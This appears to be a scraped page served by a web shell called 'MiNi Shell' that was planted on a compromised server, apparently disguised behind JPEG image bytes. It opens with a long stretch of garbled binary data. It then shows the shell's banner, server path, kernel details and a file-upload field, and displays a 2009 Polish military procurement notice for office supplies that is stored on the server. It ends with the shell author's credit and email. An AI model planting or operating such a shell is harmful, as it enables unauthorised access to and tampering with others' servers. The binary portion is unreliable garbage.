JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090426/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090426/66785-N-2009.html

<p class="kh_header"><b>Warszawa: Dostawa artykułów biurowych dla Batalionu Reprezentacyjnego Wojska Polskiego, nr sprawy 05/2009/Szkol.</b><br>
<b>Numer ogłoszenia: 66785 - 2009; data zamieszczenia: 26.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Batalion Reprezentacyjny Wojska Polskiego , ul. Hynka 2, 00-909 Warszawa, woj. mazowieckie, tel. 022 6847206, 6848209.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brepr.wp.mil.pl.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa - podsektor rządowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów biurowych dla Batalionu Reprezentacyjnego Wojska Polskiego, nr sprawy 05/2009/Szkol..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje dostawę artykułów biurowych dla Batalionu Reprezentacyjnego Wojska Polskiego. 
Szczegółowy opis zamówienia stanowi załącznik nr 5 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.10.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W celu zabezpieczenia podpisania umowy przez wykonawców, każda oferta musi być zabezpieczona wadium.
Wadium, które należy wpłacić na poszczególne części zamówienia.

Lp.	Część zamówienia	Kwota wadium
1	Część I	220,00 zł.
2	Część II	60,00 zł.
3	Część III	80,00 zł.
Razem wadium na wszystkie części	360,00
Uwaga: W przypadku gdy Wykonawca składa ofertę na wszystkie części zamówienia wadium wynosi: 360,00 zł, (słownie: trzysta sześćdziesiąt złotych). Natomiast gdy Wykonawca składa ofertę na więcej niż jedną cześć zamówienia musi zsumować kwoty przypisane do poszczególnych części, na które składa ofertę.   

FORMA I SPOSÓB WNIESIENIA WADIUM:
1. Wadium może być wnoszone według wyboru wykonawcy w jednej lub w kilku następujących formach:
1)    pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo  - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)    gwarancjach bankowych;
4)    gwarancjach ubezpieczeniowych;
5)   poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz.1158, z późn. zm.).
3. Sposób wniesienia wadium:
1)  wadium wnoszone w pieniądzu wykonawca wpłaca przelewem na rachunek bankowy Zamawiającego: Bank NBP o/ Warszawa 87 10101010 0018 2113 9120 0000 z dopiskiem wadium w postępowaniu 05/2009/Szkol. a kserokopię potwierdzenia przelewu załączyć do oferty;
2)  pozostałe formy wadium - oryginał należy złożyć w kasie Zamawiającego (budynek SZTABU, I piętro; a kserokopię zamieścić w ofercie.
4. Wadium należy wnieść przed upływem terminu składania ofert w odpowiedniej wysokości. 
5. Za skuteczne wniesienie wadium Zamawiający uważa wadium, które w oznaczonym terminie znajdzie się na koncie (kasie) Zamawiającego. 
6. Wykonawca, którego oferta nie będzie zabezpieczona akceptowaną formą i w odpowiedniej wysokości wadium, zostanie wykluczony.
7. Zamawiający zwróci niezwłocznie wadium, jeżeli:
1)   upłynie termin związania ofertą;
2) zostanie zawarta umowa w sprawie zamówienia publicznego i zostanie wniesione zabezpieczenie należytego wykonania umowy;
3) Zamawiający unieważni postępowanie o udzielenie zamówienia, a protesty zostaną ostatecznie rozstrzygnięte lub upłynie termin do ich wniesienia.
8. Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy:
1)   który wycofa ofertę przed upływem terminu składania ofert;
2)   który został wykluczony z postępowania;
3)   którego oferta została odrzucona.
9. Zamawiający żąda ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie ust. 7 pkt 2 i 3, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego.
10. Wadium wniesione w pieniądzu będzie przechowywane na oprocentowanym rachunku bankowym i zostanie zwrócone wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było przechowywane, pomniejszone o koszt prowadzenia tego rachunku oraz prowizji za przelew na rachunek bankowy wykonawcy.
11. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca, którego oferta zostanie wybrana:
1)  odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
w ofercie;
2)  nie wniesie wymaganego zabezpieczenia należytego wykonania umowy;
     zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> I. [Warunki udziału w postępowaniu] O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy i nie podlegają wykluczeniu z postępowania na podstawie art.  24 ust. 1 i 2 ustawy, a w szczególności:
1) wykonali w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o   udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie  dostawy odpowiadające swoim rodzajem i wartością dostawie  stanowiącej przedmiot zamówienia.
2) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj. posiadają w dyspozycji  środki własne lub środki z kredytu obrotowego lub z kredytu odnawialnego lub innego kredytu, lub zdolność kredytową w wysokości, co najmniej 50% wartości składanej oferty. 
3) nie zalegają z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, 
4) [Przesłanki wykluczenia] Zamawiający wykluczy Wykonawcę z postępowania, jeżeli zajdzie jedna z okoliczności wymienionych w art. 24 ust. 1 i 2 ustawy Pzp.
II. [Sposób oceny spełniania warunków] Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu jeżeli będzie to wynikało z oświadczeń i dokumentów, o których mowa w rozdziale VII złożonych wraz z ofertą. Wykonawca może spełniać albo nie spełniać warunków udziału w postępowaniu, oceny spełniania warunków nie stopniuje się.
III. [Wykonawcy wspólnie ubiegający się o zamówienie publiczne] 
1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (art. 23 ustawy).
2. Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu
o udzielenie zamówienia i zawarcia umowy w sprawie zamówienia publicznego.
Uwaga: Oferta składana przez spółki cywilne, ustawowo zdefiniowane art. 860 Kodeksu cywilnego, zgodnie z art. 4 ust. 2 ustawy z dnia 2 lipca 2004 r. o swobodzie działalności gospodarczej Dz. U. 04.173.poz 1807 z późn. zm.) jest traktowana jako oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego (art. 23 Pzp.) i solidarnie za nie odpowiadających (art. 864 Kodeksu cywilnego)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I. Oferta musi zawierać:
1. Formularz ofertowy - sporządzony zgodnie z załącznikiem nr 1 do SIWZ, zawierający:
1) ofertę cenową,
2) oświadczenie dotyczące akceptacji wzoru umowy,
3) oświadczenie dotyczące gwarancji.
II. Zamawiający żąda złożenia do oferty niżej wymienionych oświadczeń:
1. Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 pkt. 1-4 ustawy sporządzone wg wzoru z załącznika nr 2 do SIWZ.
III. Zamawiający żąda złożenia do oferty niżej wymienionych dokumentów:
1. Dokumenty potwierdzające, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności: 
1) aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2. Dokumenty potwierdzające, że wykonawca nie podlega wykluczeniu z udziału 
w postępowaniu:
1) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
2) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, przy właściwości podmiotowej określonej ustawą z dnia 
28 października 2002 r. o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary (Dz. U. 02.197.1661 z późn. zm.)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.brepr.wp.mil.pl;.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> BATALION REPREZENTACYJNY WOJSKA POLSKIEGO ul. Franciszka Hynka 2; 00-909 Warszawa 60; Kancelaria Jawna - budynek SZTABU - pokój nr 112 (I piętro), w godz.: od 7:30-10:00 od 12:00-15:30.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2009 godzina 12:00, miejsce: BATALION REPREZENTACYJNY WOJSKA POLSKIEGO ul. Franciszka Hynka 2; 00-909 Warszawa 60; Kancelaria Jawna - budynek SZTABU - pokój nr 112 (I piętro), w godz.: od 7:30-10:00 od 12:00-15:30.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Różny sprzęt i artykuły biurowe..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa sprzetu i arytykułów buiurowych. Szczegółowy opis zamówienia stanowi załącznik nr 5 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.10.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kalendarze do planowania spotkań;.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa kalendarzy do planowania spotkań na 2010 r. Szczegółowy opis zamówienia stanowi załącznik nr 5 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.10.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Papier do drukarek.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa papieru do drukarek. Szczegółowy opis zamówienia stanowi załącznik nr 5 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.10.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com